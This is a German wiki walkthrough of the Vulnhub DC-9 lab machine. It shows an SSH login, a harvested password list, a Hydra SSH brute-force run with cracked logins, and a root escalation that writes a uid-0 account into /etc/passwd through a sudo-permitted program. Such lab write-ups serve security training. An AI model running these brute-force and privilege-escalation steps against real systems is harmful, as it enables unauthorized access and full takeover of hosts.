Vulnhub dc-9 Einloggen und gucken

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen

Einloggen

  • ssh janitor@10.0.10.58 255 ⨯
janitor@10.0.10.58's password: 
Linux dc-9 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Mar  9 19:57:31 2023 from 10.0.10.101
  • ls -la
total 16
drwx------  4 janitor janitor 4096 Mar  9 19:57 .
drwxr-xr-x 19 root    root    4096 Dec 29  2019 ..
lrwxrwxrwx  1 janitor janitor    9 Dec 29  2019 .bash_history -> /dev/null
drwx------  3 janitor janitor 4096 Mar  9 19:57 .gnupg
drwx------  2 janitor janitor 4096 Dec 29  2019 .secrets-for-putin

Was ist in diesem Verzeichnis?

cat .secrets-for-putin/passwords-found-on-post-it-notes.txt 

BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts

Wir erweiteren unsere pass.txt

password
3kfs86sfd
468sfdfsd2
4sfd87sfd1
RocksOff
TC&TheBoyz
B8m#48sd
Pebbles
BamBam01
UrAG0D!
Passw0rd
yN72#dsd
ILoveRachel
3248dsds7s
smellycats
YR3BVxxxw87
Ilovepeepee
Hawaii-Five-0
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts

Erneuter Test

  • hydra -L users.txt -P pass.txt 10.0.10.58 ssh 130 ⨯
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** 
ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-09 11:23:03
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 551 login tries (l:19/p:29), ~35 tries per task
[DATA] attacking ssh://10.0.10.58:22/
[22][ssh] host: 10.0.10.58   login: fredf   password: B4-Tru3-001
[22][ssh] host: 10.0.10.58   login: chandlerb   password: UrAG0D!
[22][ssh] host: 10.0.10.58   login: joeyt   password: Passw0rd
[22][ssh] host: 10.0.10.58   login: janitor   password: Ilovepeepee
1 of 1 target successfully completed, 4 valid passwords found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-09 11:24:56

Wir werden fredf

janitor@dc-9:~$ su - fredf
Password: 
fredf@dc-9:~$ 
fredf@dc-9:~$

Darf fredf ein Program als root ausführen?

  • sudo -l
Matching Defaults entries for fredf on dc-9:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin 

User fredf may run the following commands on dc-9:
    (root) NOPASSWD: /opt/devstuff/dist/test/test

Wir genrieren einen Hackeruser

  • echo hacker:$(openssl passwd -1 -salt salz 12345678):0:0::/root:/bin/bash > hacker.account
  • sudo /opt/devstuff/dist/test/test hacker.account /etc/passwd
  • tail -n 1 /etc/passwd
hacker:$1$salz$MXi.F00pwv2Vq8c1XSZk/1:0:0::/root:/bin/bash
  • su - hacker
  • id
uid=0(root) gid=0(root) groups=0(root)

welche Kernelversion läuft?

  • uname -a
Linux dc-9 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64 GNU/Linux
Abgerufen von „http://wiki.ixheim.de/index.php?title=Vulnhub_dc-9_Einloggen_und_gucken&oldid=43055